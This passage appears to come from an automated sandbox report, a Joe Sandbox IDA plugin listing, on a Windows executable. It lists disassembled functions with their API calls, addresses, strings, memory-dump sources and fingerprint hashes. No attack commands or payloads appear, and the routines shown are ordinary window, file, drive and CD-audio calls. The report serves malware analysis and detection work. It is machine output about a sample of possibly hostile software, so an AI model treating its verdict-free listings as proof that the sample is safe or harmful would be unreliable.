                                                                                                        • GetParent.USER32(?), ref: 004618C3
                                                                                                        • ScreenToClient.USER32(00000000), ref: 004618CA
                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                                                        • String ID: %s%u
                                                                                                        • API String ID: 1899580136-679674701
                                                                                                        • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                                        • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                                                                        • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                                        • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                                                                        Function 0045FD57 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 227windowsleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                                                                        • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                                                                        • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InfoItemMenu$Sleep
                                                                                                        • String ID: 0
                                                                                                        • API String ID: 1196289194-4108050209
                                                                                                        • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                                                                        • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                                                                        • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                                                                        • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                                                                        Function 004313CA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetDC.USER32(00000000), ref: 0043143E
                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00431466
                                                                                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                                                                        • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                                        • String ID: (
                                                                                                        • API String ID: 3300687185-3887548279
                                                                                                        • Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                                                                        • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                                                                        • Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                                                                        • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                                                                        Function 0045DA73 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 141COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                          • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                                        • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                        • API String ID: 1976180769-4113822522
                                                                                                        • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                                        • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                                                                        • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                                        • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                                                                        Function 00432A10 Relevance: 21.1, APIs: 14, Instructions: 140timeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                                                                        • String ID:
                                                                                                        • API String ID: 461458858-0
                                                                                                        • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                                        • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                                                                        • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                                        • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                                                                        Function 0043009D Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                                                                        • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                                                                        • DeleteObject.GDI32(?), ref: 004301D0
                                                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                        • String ID:
                                                                                                        • API String ID: 3969911579-0
                                                                                                        • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                                        • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                                                                        • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                                        • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                                                                        Function 004551F5 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                                                                        • String ID: 0
                                                                                                        • API String ID: 956284711-4108050209
                                                                                                        • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                                        • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                                                                        • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                                        • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                                                                        Function 00433493 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                        • String ID: 0.0.0.0
                                                                                                        • API String ID: 1965227024-3771769585
                                                                                                        • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                                                                        • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                                                                        • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                                                                        • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                                                                        Function 0045F56D Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 78COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: SendString$_memmove_wcslen
                                                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                        • API String ID: 369157077-1007645807
                                                                                                        • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                                        • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                                                                        • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                                        • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                                                                        Function 00445BE4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 77windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetParent.USER32 ref: 00445BF8
                                                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                                                                        • __wcsicoll.LIBCMT ref: 00445C33
                                                                                                        • __wcsicoll.LIBCMT ref: 00445C4F
                                                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                        • API String ID: 3125838495-3381328864
                                                                                                        • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                                        • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                                                                        • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                                        • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                                                                        Function 004491B9 Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                                                                        • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                                                                        • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                                                                        • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                                                                        • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$CharNext
                                                                                                        • String ID:
                                                                                                        • API String ID: 1350042424-0
                                                                                                        • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                                        • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                                                                        • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                                        • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                                                                        Function 00478656 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 197COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                          • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                                        • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                                                                        • _wcscpy.LIBCMT ref: 004787E5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                                                        • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                        • API String ID: 3052893215-2127371420
                                                                                                        • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                                        • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                                                                        • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                                        • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                                                                        Function 0045E737 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                        • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                                                                        • __swprintf.LIBCMT ref: 0045E7F7
                                                                                                        • _wprintf.LIBCMT ref: 0045E8B3
                                                                                                        • _wprintf.LIBCMT ref: 0045E8D7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
